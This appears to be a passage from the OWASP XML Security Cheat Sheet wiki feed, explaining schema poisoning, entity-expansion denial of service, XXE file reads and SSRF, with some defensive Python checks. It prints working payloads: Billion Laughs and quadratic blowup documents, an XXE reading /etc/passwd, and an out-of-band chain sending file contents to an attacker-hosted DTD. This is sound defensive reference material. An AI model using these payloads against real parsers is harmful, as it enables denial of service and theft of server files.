  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, and it must contain a way to check the integrity of the embedded schema to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
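A deployment check for this condition can be sketched in Python by reading the mode string of the schema file, which has the same layout as the listing above. The function name &amp;lt;tt&amp;gt;writable_by_others&amp;lt;/tt&amp;gt; is hypothetical, and the sketch assumes a POSIX filesystem without additional access control lists:&lt;br /&gt;
&lt;br /&gt;
```python
import os
import stat


def writable_by_others(path):
    """Return True if the group or other permission bits allow writing."""
    # filemode() renders the mode like ls does, for example -rw-rw-rw-
    mode_text = stat.filemode(os.stat(path).st_mode)
    # Position 5 is the group write flag, position 8 the other write flag.
    return mode_text[5] == "w" or mode_text[8] == "w"
```
&lt;br /&gt;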
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee, or by an external attacker in control of these files, could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is a DTD).&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
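&lt;br /&gt;
A circular definition like this one can be detected before any expansion takes place by walking the graph of entity references. The following Python sketch is illustrative only: the helper name find_entity_cycle and the dictionary that maps each entity name to the names used in its value are assumptions made for this example, not part of any parser API.&lt;br /&gt;

```python
def find_entity_cycle(references):
    """Return a list of entity names forming a cycle, or None if there is none.

    `references` maps an entity name to the entity names used in its value
    (a hypothetical, pre-extracted view of the DTD).
    """
    visiting, done = [], set()

    def visit(name):
        if name in done:
            return None
        if name in visiting:
            # The path from the first occurrence of `name` back to itself is the cycle.
            return visiting[visiting.index(name):] + [name]
        visiting.append(name)
        for target in references.get(name, ()):
            cycle = visit(target)
            if cycle:
                return cycle
        visiting.pop()
        done.add(name)
        return None

    for entity in references:
        cycle = visit(entity)
        if cycle:
            return cycle
    return None


# Entities from the example above: A references B, and B references A.
recursive_dtd = {"A": ["B"], "B": ["A"]}
print(find_entity_cycle(recursive_dtd))  # ['A', 'B', 'A']
```

A processor that finds a cycle can reject the document outright instead of attempting to resolve it.&lt;br /&gt;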
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
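&lt;br /&gt;
The asymmetry between what the attacker sends and what the parser must hold can be estimated with simple arithmetic. The Python sketch below is a rough illustration; the function name quadratic_blowup is hypothetical, and the estimate ignores the surrounding markup.&lt;br /&gt;

```python
def quadratic_blowup(entity_length, reference_count, entity_name="A"):
    """Estimate document size versus expanded size without expanding anything."""
    # A reference is an ampersand, the entity name, and a semicolon.
    reference_size = len(entity_name) + 2
    document_size = entity_length + reference_count * reference_size
    expanded_size = entity_length * reference_count
    return document_size, expanded_size


document_size, expanded_size = quadratic_blowup(100_000, 100_000)
print(document_size)                   # 400000 characters sent (markup excluded)
print(expanded_size)                   # 10000000000 characters after expansion
print(expanded_size // document_size)  # amplification factor: 25000
```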
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by expanding the 10^9 references to &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, roughly 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
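&lt;br /&gt;
The size of this expansion can be computed without performing it. The Python sketch below assumes the layout of the example above (a three-character base string, ten references per level, nine levels); the function name billion_laughs_size is hypothetical.&lt;br /&gt;

```python
def billion_laughs_size(base_text="LOL", references_per_level=10, levels=9):
    """Return (copies, characters) produced by expanding the top-level entity."""
    copies = references_per_level ** levels
    return copies, copies * len(base_text)


copies, characters = billion_laughs_size()
print(copies)      # 1000000000
print(characters)  # 3000000000
```

A processor could apply the same arithmetic as a budget check and refuse documents whose projected expansion exceeds a configured limit.&lt;br /&gt;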
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;SOAP:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt;&lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; that refers to the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file served over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, or to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish in higher latency networks.&lt;br /&gt;
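&lt;br /&gt;
The averaging step can be sketched in Python as follows. The timings are made-up values for illustration only, the threshold is an arbitrary assumption, and the function name classify_ports is hypothetical. Which side of the threshold means an open port depends on the target; this sketch assumes that closed ports answer more slowly.&lt;br /&gt;

```python
from statistics import mean


def classify_ports(samples, threshold_seconds):
    """Label each port by comparing its average response time with a threshold."""
    result = {}
    for port, timings in samples.items():
        average = mean(timings)
        # Assumption: responses faster than the threshold indicate an open port.
        result[port] = "open" if threshold_seconds > average else "closed"
    return result


# Made-up timings in seconds, for illustration only.
hypothetical_samples = {
    80: [0.21, 0.19, 0.23, 0.20],
    8080: [1.10, 0.95, 1.30, 1.05],
}
print(classify_ports(hypothetical_samples, threshold_seconds=0.5))
```

Taking several measurements per port reduces the effect of a single slow response, which is why a higher latency network makes the two groups harder to separate.&lt;br /&gt;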
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
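&lt;br /&gt;
On the defensive side, an application that resolves external identifiers could refuse any URI that carries credentials. The Python sketch below uses urlsplit from the standard library to show how the URI above breaks down; the helper name embedded_credentials is hypothetical and the rejection policy is an assumption of this example.&lt;br /&gt;

```python
from urllib.parse import urlsplit


def embedded_credentials(uri):
    """Return (username, password) found in the URI authority, or None."""
    parts = urlsplit(uri)
    if parts.username is None and parts.password is None:
        return None
    return parts.username, parts.password


print(embedded_credentials("foo://username:password@example.com:8080/"))  # ('username', 'password')
print(embedded_credentials("http://example.com/note.dtd"))                # None
```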
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224421</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224421"/>
				<updated>2016-12-21T20:06:15Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
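&lt;br /&gt;
Such a comparison can be sketched with the Python standard library. The example below is a minimal harness under stated assumptions: the document shape, the element names, and the way the malformed variant is produced (truncating the final closing tag) are all hypothetical choices, and a real measurement would repeat each parse many times against the parser actually in use.&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def build_document(item_count):
    """Serialize a well-formed document with `item_count` child elements."""
    root = ET.Element("items")
    for index in range(item_count):
        ET.SubElement(root, "item").text = str(index)
    return ET.tostring(root)


def timed_parse(data):
    """Return (seconds, parsed_ok) for a single parse attempt."""
    start = time.perf_counter()
    try:
        ET.fromstring(data)
        parsed_ok = True
    except ET.ParseError:
        parsed_ok = False
    return time.perf_counter() - start, parsed_ok


well_formed = build_document(10_000)
malformed = well_formed[:-3]  # cut into the final closing tag

for label, data in (("well-formed", well_formed), ("malformed", malformed)):
    seconds, parsed_ok = timed_parse(data)
    print(label, parsed_ok, round(seconds, 4))
```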
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
